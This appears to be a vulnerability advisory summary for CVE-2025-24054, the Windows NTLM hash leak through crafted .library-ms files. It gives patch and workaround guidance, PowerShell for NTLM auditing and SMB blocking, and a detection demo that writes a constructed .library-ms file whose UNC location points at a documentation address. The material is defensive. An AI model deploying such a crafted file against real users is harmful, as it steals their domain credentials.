Full Report
A Windows vulnerability that exposes NTLM hashes using .library-ms files is now actively exploited by hackers in phishing campaigns targeting government entities and private companies. [...]
Analysis Summary
# Vulnerability: Windows NTLM Hash Leak via Malicious .library-ms File
## CVE Details
- CVE ID: CVE-2025-24054 (Microsoft title: "NTLM Hash Disclosure Spoofing Vulnerability")
- CVSS Score: 6.5, Medium (Microsoft's CVSS 3.1 base score: network attack vector, low complexity, user interaction required)
- CWE: Not stated in the source. The closest category is CWE-73 (External Control of File Name or Path): the attacker supplies the UNC path that Explorer opens, and the credential leak is the side effect. It is not an authentication bypass in NTLM itself.
## Affected Systems
- Products: Windows client and server releases that were in support in March 2025; the flaw is in how Windows Explorer (the shell) resolves the location stored in a `.library-ms` file
- Versions: Any build without the March 2025 security update; Microsoft's advisory lists the specific releases and KB numbers
- Configurations: Any host that is allowed to send NTLM authentication to remote servers and can reach attacker-controlled hosts on TCP 445 (or 139). Hosts behind a perimeter that blocks outbound SMB, or with outgoing NTLM to remote servers denied, are not exploitable even when unpatched.
## Vulnerability Description
The vulnerability is in how Windows Explorer handles the `.library-ms` file type. A library file is an XML document describing one or more folder locations; an attacker crafts one whose location is a UNC path (`\\host\share`) to a Server Message Block (SMB) server they control. Explorer resolves that location as soon as it needs to render the file, so minimal interaction, such as **single-clicking, right-clicking, or inspecting** it, or simply viewing the folder it was saved to, makes the Windows SMB client open a session to the attacker's server. The server demands NTLM authentication and the client answers with the user's credentials: what the attacker captures is the Net-NTLMv2 challenge-response (commonly called the "NTLM hash"), which can be cracked offline to recover the password or relayed to another service that accepts NTLM. The first campaigns delivered the file inside a ZIP archive; in later campaigns it was sent on its own, and because Explorer parses it in place, downloading it into a folder the user is viewing was enough to trigger the leak.
## Exploitation
- Status: Exploited in the wild. Check Point Research observed campaigns against government entities and private companies within days of the patch release.
- Complexity: Low. No exploit code runs on the victim; the user only has to view, select, or right-click the file in Explorer.
- Attack Vector: Network. The file is delivered by phishing (as an attachment, inside a ZIP, or via a download link) and the leak travels over SMB to the attacker's server; the user must be tricked into handling the file (CVSS user interaction: required).
## Impact
- Confidentiality: High. The captured Net-NTLMv2 response can be cracked offline (weak or reused passwords fall quickly) or relayed to other services, so it amounts to theft of the user's domain credential.
- Integrity: Medium. With the relayed or cracked credential an attacker can authenticate as the user to file shares, mail, or other NTLM-accepting services and move laterally; escalation beyond the user's own privileges depends on what that account can reach.
- Availability: Low. The leak itself has no availability impact.
## Remediation
### Patches
- Microsoft fixed the flaw in the **March 2025 security updates** (Patch Tuesday, 11 March 2025). Apply them; the vulnerability was being exploited within days of the release, so unpatched hosts should be treated as exposed.
### Workarounds
- Block outbound SMB (TCP 445 and 139) to the Internet at the perimeter and in the host firewall; without an SMB session there is no NTLM exchange. Legitimate file shares are almost never reached across the Internet on these ports.
- Set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" (registry value `RestrictSendingNTLMTraffic` under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0`) to Audit first, review the Event ID 8001 records in the Microsoft-Windows-NTLM/Operational log, then move to Deny with exceptions for the servers that still need NTLM.
- Disable NTLM entirely where the environment can run on Kerberos; where it cannot, require SMB signing and Extended Protection for Authentication on servers so that a captured exchange cannot be relayed (this does not stop offline cracking).
- Block `.library-ms` attachments at the mail gateway, including inside ZIP archives; the file type has no business arriving by email.
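The first two workarounds above, as an added PowerShell example (not from the Check Point report or from Microsoft's published guidance): it puts the "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy into audit mode with an optional exception list, adds a host-firewall rule blocking outbound TCP 445/139 to the Internet, and lists the audit events the policy produces. The server names in the exception list are placeholders. The `Internet` keyword is Windows Firewall's predefined address set; which internal addresses it excludes depends on the host's network profile, so verify that your own shares are still reachable before moving the policy to Deny.

```powershell
# Run elevated. Audit first: denying outgoing NTLM breaks access to servers that only accept NTLM.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

# 1. "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers"
#    0 = Allow all, 1 = Audit all, 2 = Deny all. Audited or denied attempts are logged as
#    Event ID 8001 in Microsoft-Windows-NTLM/Operational, with the target server name.
function Set-OutgoingNtlmPolicy {
    param(
        [ValidateSet('Allow', 'Audit', 'Deny')][string]$Mode = 'Audit',
        [string[]]$AllowedServers = @()    # placeholder names, e.g. 'fileserver01', '*.corp.example'
    )
    $value = @{ Allow = 0; Audit = 1; Deny = 2 }[$Mode]
    New-Item -Path $lsa -Force | Out-Null
    Set-ItemProperty -Path $lsa -Name RestrictSendingNTLMTraffic -Value $value -Type DWord
    if ($AllowedServers.Count -gt 0) {
        # "Restrict NTLM: Add remote server exceptions for NTLM authentication"
        Set-ItemProperty -Path $lsa -Name ClientAllowedNTLMServers -Value $AllowedServers -Type MultiString
    }
}

# 2. Stop SMB/NetBIOS from leaving the host for the Internet. Explorer's SMB session to the
#    attacker's server never completes, so no NTLM exchange takes place.
function Block-OutboundSmbToInternet {
    $name = 'Block outbound SMB/NetBIOS to Internet'
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Outbound -Action Block -Protocol TCP `
            -RemotePort 445, 139 -RemoteAddress Internet -Profile Any | Out-Null
    }
}

# 3. What the audit policy is seeing: each record names the server NTLM was sent to.
function Get-OutgoingNtlmAuditEvent {
    param([int]$MaxEvents = 50)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

Set-OutgoingNtlmPolicy -Mode Audit -AllowedServers @('fileserver01')   # placeholder exception
Block-OutboundSmbToInternet
Get-OutgoingNtlmAuditEvent | Format-List
```

Switch to `-Mode Deny` only after the 8001 events show nothing but hosts you expect; the exception list is matched against the server name the client is connecting to, so add internal file servers there rather than leaving the policy at Audit.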
## Detection
- **Indicators of Compromise (IoC):** Outbound SMB connections (TCP 445 or 139) from user workstations to public IP addresses, especially shortly after an email attachment or download was opened or previewed; `.library-ms` files arriving by email or inside ZIP archives whose `<url>` element holds a UNC path to an external host.
- **Detection Methods and Tools:** Firewall, NetFlow, or Sysmon Event ID 3 telemetry for workstation-to-Internet traffic on ports 445/139. Note that the SMB client runs in the kernel, so the connection is attributed to the System process rather than to explorer.exe; filter on the destination, not on the process name. If outgoing NTLM restriction is in audit mode, Event ID 8001 in the Microsoft-Windows-NTLM/Operational log records each attempt together with the target server name. Mail gateway and endpoint tooling should parse `.library-ms` attachments (they are plain XML) and flag any location that is a UNC path to a non-internal host.
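The mechanism from the Vulnerability Description and the two detection methods above, as an added PowerShell example that is not part of the Check Point report: it writes a constructed `.library-ms` file (same XML layout as the libraries Windows ships, with the `<url>` element pointing at the documentation address 203.0.113.10 rather than any real campaign server), parses such files with DTD processing disabled, flags locations that are UNC paths to non-internal hosts, and separately queries Sysmon Event ID 3 for outbound SMB to public addresses. The `.corp.example` suffix, the file name and the temp directory are placeholders.

```powershell
function Test-PrivateIPv4 {
    # True for RFC 1918 and loopback IPv4 addresses; false for hostnames and everything else.
    param([string]$Address)
    $ip = $null
    if (-not [System.Net.IPAddress]::TryParse($Address, [ref]$ip)) { return $false }
    if ($ip.AddressFamily -ne [System.Net.Sockets.AddressFamily]::InterNetwork) { return $false }
    $b = $ip.GetAddressBytes()
    return (($b[0] -eq 10) -or
            ($b[0] -eq 172 -and $b[1] -ge 16 -and $b[1] -le 31) -or
            ($b[0] -eq 192 -and $b[1] -eq 168) -or
            ($b[0] -eq 127))
}

function Get-LibraryMsLocation {
    # Returns one object per <url> element in a .library-ms file. RemoteUnc is true when the
    # location is \\host\... and the host is neither a private IPv4 address nor a trusted suffix.
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$TrustedHostSuffix = @('.corp.example')   # placeholder internal DNS suffix
    )
    $settings = New-Object System.Xml.XmlReaderSettings
    $settings.DtdProcessing = [System.Xml.DtdProcessing]::Prohibit   # untrusted input: no DTD/entity tricks
    $settings.XmlResolver = $null
    $reader = [System.Xml.XmlReader]::Create($Path, $settings)
    try {
        $xml = New-Object System.Xml.XmlDocument
        $xml.Load($reader)
    } finally { $reader.Dispose() }
    # GetElementsByTagName ignores the default namespace, so real and hand-made files both work.
    foreach ($node in $xml.GetElementsByTagName('url')) {
        $url = $node.InnerText.Trim()
        $target = $null; $remote = $false
        if ($url -match '^\\\\([^\\]+)(\\|$)') {          # UNC: Explorer opens an SMB session to this host
            $target = $Matches[1]
            $trusted = $false
            foreach ($s in $TrustedHostSuffix) { if ($target.EndsWith($s, 'OrdinalIgnoreCase')) { $trusted = $true } }
            $remote = -not (Test-PrivateIPv4 $target) -and -not $trusted
        }
        [pscustomobject]@{ File = $Path; Url = $url; TargetHost = $target; RemoteUnc = $remote }
    }
}

function Get-OutboundSmbEvent {
    # Sysmon Event ID 3 (network connection). The SMB client runs in the kernel, so the
    # connection is attributed to the System process, not explorer.exe: filter on port and
    # destination, never on the image name.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 3 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
      ForEach-Object {
        $d = @{}
        foreach ($f in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$f.Name] = $f.'#text' }
        if (($d['DestinationPort'] -in '445', '139') -and -not (Test-PrivateIPv4 $d['DestinationIp'])) {
            [pscustomobject]@{ Time = $_.TimeCreated; Image = $d['Image']; User = $d['User']
                               DestinationIp = $d['DestinationIp']; DestinationPort = $d['DestinationPort'] }
        }
      }
}

# --- Demo on a constructed file (not a sample from the campaign) ---
$demoDir = Join-Path $env:TEMP 'libraryms-demo'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
$constructed = @'
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\203.0.113.10\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
'@
Set-Content -Path (Join-Path $demoDir 'invoice.library-ms') -Value $constructed -Encoding UTF8

Get-ChildItem -Path $demoDir -Filter '*.library-ms' -Recurse |
    ForEach-Object { Get-LibraryMsLocation -Path $_.FullName } |
    Where-Object RemoteUnc |
    Format-Table File, TargetHost, Url -AutoSize
# In production, point the same pipeline at a mail quarantine or at users' Downloads folders.

# Network side: returns nothing if Sysmon is not installed or has no matching events.
Get-OutboundSmbEvent | Format-Table -AutoSize
```

A legitimate library points at `knownfolder:{...}` GUIDs or local paths, so any UNC location in a file that arrived by email is suspicious on its own; the private-address check only keeps the scanner quiet on libraries that genuinely reference internal shares.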
## References
- Check Point Research, "CVE-2025-24054, NTLM Exploit in the Wild": research[.]checkpoint[.]com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
- Microsoft Security Response Center, CVE-2025-24054 (March 2025 security updates): msrc[.]microsoft[.]com/update-guide/vulnerability/CVE-2025-24054